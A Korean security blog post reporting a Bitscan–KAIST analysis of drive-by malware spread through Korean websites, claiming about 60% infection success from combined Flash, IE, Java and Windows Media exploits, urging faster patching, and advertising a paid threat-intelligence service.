긴급하게 국내의 PC 환경에서 필요한 부분들은 각 어플리케이션에 대한 업데이트가 필요하며, 업데이트 출현 이전이라도 (Flash Java의 경우) 공격이 발생 되었을 경우 차단 할 수 있는 방안들에 대한 진지한 모색이 필요하다. 사후 대응으로는 현재의 심각한 상황을 넘기기엔 힘겨워 보인다.

 

결론적으로 악성코드 감염 비율로 살펴 보았을 때 Flash, IE, Java, Windows Media에 대한 복합화된 공격의 성공률은 현재 60% 수준으로 볼 수 있다. 공격자들은 단일 취약성을 공격하는 것이 아닌 여러 취약성을 동시에 공격하여 이 중 하나만 문제가 있어도 바로 권한을 획득하는 형태로 공격 형태가 갖추어져 있으며 그 결과로 악성코드를 중계하는 모든 웹서비스의 방문자중 60% 가량은 좀비 PC화가 된다. 국내의 대규모 커뮤니티 및 파일 공유 사이트의 방문자들중 60% 가량은 좀비 PC일 가능성이 매우 높다는 것을 증명하는 최초의 증거이다.  문제 원인으로는 여전히 각 취약성별 업데이트가 제대로 이루어지지 않고 있다는 것과 국내에서 주로 사용 되고 있는 백신 제품들에 의한 차단 효과가 그리 높지 않음을 의미 하며, 또한 Java Flash 같은 개별 제품의 업데이트에 의존하는 어플리케이션들도 지금과 같은 수동적인 업데이트 방식과 늦은 대응으로는 한계가 있을 수 밖에 없다는 것을 증명한다.

 

악성코드 및 악성링크에 대한 공동 분석을 주도 했던 전 상훈 빛스캔㈜ 기술이사는 그 동안 알려지지 않았던 웹을 통한 악성코드 유포의 결과와 위험성에 대한 실제적인 데이터가 발견 되어 국내의 상황이 생각보다 심각함을 확인 할 수 있었고, 현재의 대응 수준보다 더 선제적이고 빠른 대응이 시급하게 요구 되는 상황이다.” 라고 분석의 결과와 의미를 정리 하였다.

 

* 국내 환경에서 발생되는 실질적인 공격과 위험성에 대한 조사와 대응을 위해 빛스캔㈜와 카이스트 사이버보안연구센터에서는 공동으로 위협정보 제공 서비스를 3월부터 운영을 할 예정입니다.  제한된 고객사 (기업, 기관 등의 실무 보안조직과 운영 조직이 있는 경우에 필요한 정보임)에 한해 유상으로 서비스를 시작 할 예정이므로 샘플 보고서와 서비스에 대한 안내가 필요한 기업은 info@bitscan.co.kr 로 메일로 문의 바랍니다.

 

Posted by 바다란